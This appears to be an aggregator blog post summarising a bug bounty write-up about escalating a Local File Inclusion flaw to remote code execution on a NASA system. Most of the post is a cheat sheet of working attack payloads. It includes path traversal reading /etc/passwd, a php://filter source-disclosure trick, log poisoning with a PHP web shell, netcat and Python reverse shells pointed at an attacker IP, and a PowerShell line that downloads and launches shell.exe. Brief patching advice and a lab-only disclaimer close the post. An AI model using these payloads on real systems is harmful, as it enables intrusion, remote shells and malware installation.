How I Hacked NASA and Got a P1 on Bugcrowd

By /

Listen to this Post

0xjin.medium.com

You Should Know:

This article delves into the mindset of a threat actor and their journey of exploiting a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) on a NASA system, ultimately earning a P1 bounty on Bugcrowd. Below are some practical commands and techniques related to LFI and RCE that you can practice in a controlled environment:

Local File Inclusion (LFI) Exploitation

1. Basic LFI Payload:

http://example.com/index.php?page=../../../../etc/passwd

This payload attempts to read the `/etc/passwd` file on a Linux system.

2. Using PHP Wrappers for LFI:

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php

This encodes the `index.php` file in base64, allowing you to read its source code.

3. Log Poisoning for RCE:

Inject PHP code into log files (e.g., /var/log/apache2/access.log) and include the log file via LFI: 

http://example.com/index.php?page=../../../../var/log/apache2/access.log

Example of injected PHP code:

<?php system($_GET['cmd']); ?>

Then execute commands via:

http://example.com/index.php?page=../../../../var/log/apache2/access.log&cmd=id

Remote Code Execution (RCE) Commands

1. Reverse Shell via Netcat:

nc -e /bin/sh <ATTACKER_IP> <PORT>

On the attacker’s machine:

nc -lvp <PORT>

2. Python Reverse Shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER_IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

3. Windows Command Execution:

powershell -c "Invoke-WebRequest -Uri http://<ATTACKER_IP>/shell.exe -OutFile C:\Windows\Temp\shell.exe; Start-Process C:\Windows\Temp\shell.exe"

What Undercode Say:

Understanding the techniques used by threat actors, such as LFI to RCE, is crucial for both offensive and defensive cybersecurity practices. Always practice these commands in a legal and controlled environment, such as a lab or CTF platform. Strengthen your systems by:
– Regularly updating software to patch vulnerabilities.
– Implementing input validation and sanitization.
– Monitoring logs for suspicious activities.

For further reading on LFI and RCE, visit:

Practice these commands responsibly to enhance your cybersecurity skills!

References:

Reported By: Abhirup Konwar – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

Whatsapp
TelegramFeatured Image

Related Posts: